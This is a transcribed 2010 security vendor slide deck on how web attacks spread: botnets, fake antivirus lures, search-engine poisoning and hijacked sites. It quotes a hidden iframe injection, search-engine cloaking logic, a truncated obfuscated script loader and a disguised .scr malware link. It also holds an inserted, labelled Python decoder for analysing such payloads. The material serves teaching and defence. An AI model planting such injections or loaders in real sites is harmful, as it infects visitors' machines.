2010-11 The Anatomy of a Web Attack
- 1. The Anatomy of a Web Attack
Dennis Pike
Systems Engineer
Geo Specialists Lead – Americas Security
dennis.pike@bluecoat.com
Blue Coat Systems Confidential
Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered
in certain jurisdictions. All other product or service names are the property of their respective owners.
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
- 2. Agenda
State of the Web
• Top categories
• Top attacks
The Anatomy of a Web Attack
• Lures to web threats
• Examples
Dynamic Link Analysis
- 3. Best of the Worst
Top Web Category?
>> Among the top ten active categories of 2009, social networking access
accounted for 25 percent of all Web access activity
Top Web threat?
>> Fake Antivirus was the most successful Web threat in 2009, followed by
the Fake Video Codec offer.
>> New Fake AV installer programs increased from an average of 300 to
1,462 per day in the second half of 2009. *
>>Average lifetime of sites that redirect users to Web pages that try to
install scareware decreased with a median lifetime dropping below 100
hours around April 2009, below 10 hours around September 2009, and
below one hour since January 2010. *
*Google Inc.
- 4. Email vs Social Networking
Do more people use email or social networking sites?
>> According to Nielsen Co., in August 2009, 277 million people used email
across the U.S., several European countries, Brazil and Australia, a 21 percent
increase from the year before. But the number of users on social networking
and other community sites jumped 31 percent to 302 million, bypassing the
email user population by 10 percent.
- 5. Noteworthy Items
Argument for Video (HTTP and Streaming)
Domain: Client% Domain: Client%
~Total~: 100% ~Total~: 100.00%
youtube.com: 35.7800 youtube.com: 36.28
hotfile.com: 7.427 rapidshare.com: 6.36
apple.com: 4.901 hotfile.com: 5.26
ninjacloak.com: 4.205 apple.com: 3.98
rapidshare.com: 4.135 ninjacloak.com: 3.97
megaupload.com: 2.977 megaupload.com: 2.54
googlevideo.com: 2.66 googlevideo.com: 2.33
fbcdn.net: 1.791 fbcdn.net: 1.85
mediafire.com: 1.492 fileserve.com: 1.75
windowsupdate.com: 1.305 playstation.net: 1.74
playstation.net: 1.241 mediafire.com: 1.68
fileserve.com: 1.187 windowsupdate.com: 1.42
4shared.com: 1.031 zshare.net: 0.78
zshare.net: 0.7793 facebook.com: 0.65
dailymotion.com: 0.6476 dailymotion.com: 0.62
google.com: 0.588 4shared.com: 0.6
facebook.com: 0.5764 novamov.com: 0.54
novamov.com: 0.5737 google.com: 0.54
microsoft.com: 0.4747 farmville.com: 0.52
farmville.com: 0.4626 adobe.com: 0.41
video
filesharing
- 6. Changing Web Habits
Top 10 Categories – 2009
WebFilter/WebPulse, 62M+ Users
1. Social Networking
2. Web Advertisements
3. Search Engines/Portals
4. Personals/Dating
5. Pornography
6. Computers/Internet
7. Audio/Video Clips
8. Adult/Mature Content
9. Web Email
10. Illegal/Questionable
Social Networking
• Moved to #1 from #2 position
• Represents 25% of Top10 requests
Web Email
• Dropped to #9 from #5 position
• Users migrating to social networking
Cyber Crime Leverages
• Search engine poisoning
• Fake AV and Codec updates
• Popular site injections
• Death, Drama & Disaster lures
• Health & Wealth scams
- 7. Web Threats Rising Exponentially
2/3 of all known malicious code threats in 1 year (Symantec April’09)
1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky)
- 8. Distribution Power
Botnet computing power to:
• Pitch worthless products
• Hijack online banking accounts
• Steal corporate data
Top 5 Botnets in 2009
Botnet: Zeus | Koobface B | Koobface D | Monkif A | Clickbot
Peak number of active bots: 1,070,000 | 812,000 | 599,000 | 506,000 | 375,000
How it spreads: Search Results, Facebook, Twitter, Social Networking
USA TODAY Research – March 2010
- 9. An Invitation to Crime
1 – An automated program logs on to social network using stolen user credentials.
2 – Program messages user’s friends asking them to click on a link to a photo or video.
3 – Anyone who clicks on the link is asked to enable a media player needed to see the images. Running the file turns the PC into a bot.
4 – The bot steals the PC owner’s logon credentials, starting the cycle again.
USA TODAY Research – March 2010
- 10. Web Evolution
Static Pages → Dynamic Pages
Dynamic Pages → Interactive Pages
Publishing Model → Community Model
Single Host Pages → Multi-Host Pages
Nice to Have → Must Have
- 11. Multi-Host Pages
SPORT
6 Domains
13 Hosts
147 Requests
504 KB
14.5 Seconds
- 12. Paths to Malware Infection
Link Farms
Infected Site Search Engine
Blogs, Forums
Relay Bait
Malware
- 13. End User…Infected Site
www.inka.com
<html>
…
<iframe src="http://homenameregistration.cn/in.cgi?income12" width=1 height=1 style="visibility: hidden"></iframe><div id="header">
…
</html>
homenameregistration.cn/in.cgi?income12
- 14. Web 2.0 and Search Engines
[Diagram: Forums, Blogs, Wikis, Guestbooks; WWW; Search Engine View]
- 15. Web 2.0 and Search Engines
[Diagram: WWW content shown as Links… and Words…; Search Engine View]
- 18. Hijacked Website
xdesignstudios.com
dir1
index.php
…
id=fall+printable+coloring+pages
id=free+printable+easter+drawings
id=disney+printable+cartoon+characters
id=free+printable+halloween+sheets
id=girls+free+printable+organizer
id=in+store+printable+catherines+coupons
…
live.js
if ("search engine") {
    echo "…indexable content…"
} else {
    echo '<body><script src="live.js"></script>'
}
- 19. End User…Search Engine Redirect
index.php?id=hannah-montana-printable-birthday-invitations
<body>
<script src="live.js">
</script>
live.js
document.write(unescape('%3C%53%43%52%49%50%54%20%20%20%20%6C%61%6E%67%75…
http://cracksinside.com/red/gen.js
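Added example, not from the original slides: a static Python decoder for the `document.write(unescape('%3C…'))` wrapper shown on this slide, which recovers the hidden markup without executing it and lists script URLs that point off-site. The function names, hosts and sample payload are constructed; `js_unescape` mirrors JavaScript's `unescape()` for `%XX` and `%uXXXX` sequences.

```python
import re
from urllib.parse import urlparse

UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
SCRIPT_SRC = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def js_unescape(s):
    """Mirror JavaScript unescape(): decode %XX and %uXXXX, leave the rest."""
    return re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def decoded_payloads(js):
    """Decode every string literal passed to unescape(), without running it."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(js)]

def offsite_scripts(js, page_host):
    """Script URLs hidden in unescape() payloads that load from another host."""
    hits = []
    for markup in decoded_payloads(js):
        for url in SCRIPT_SRC.findall(markup):
            host = (urlparse(url).hostname or "").lower()
            if host and host != page_host.lower():
                hits.append(url)
    return hits

# Constructed sample: a placeholder script tag, percent-encoded the same way.
PLAIN = '<SCRIPT    language="JavaScript" src="http://redirector.example/red/gen.js"></SCRIPT>'
SAMPLE_JS = "document.write(unescape('" + "".join("%%%02X" % ord(c) for c in PLAIN) + "'));"

if __name__ == "__main__":
    print(decoded_payloads(SAMPLE_JS)[0])
    print(offsite_scripts(SAMPLE_JS, "hijacked.example"))
```

The visible part of the slide's own string decodes to `<SCRIPT    langu`, the start of a script tag.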
- 20. What just happened?
[Diagram: WWW content shown as Links… and Words…; Search Engine View; Redirect]
- 21. Recent Examples - VBMania
www.sharedocuments.com/library/PDF_Document21.025542010.pdf
Email text
www.sharedocuments.com/library/PDF_Document21.025542010.pdf
members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr
- 22. Recent Examples – Fake Warez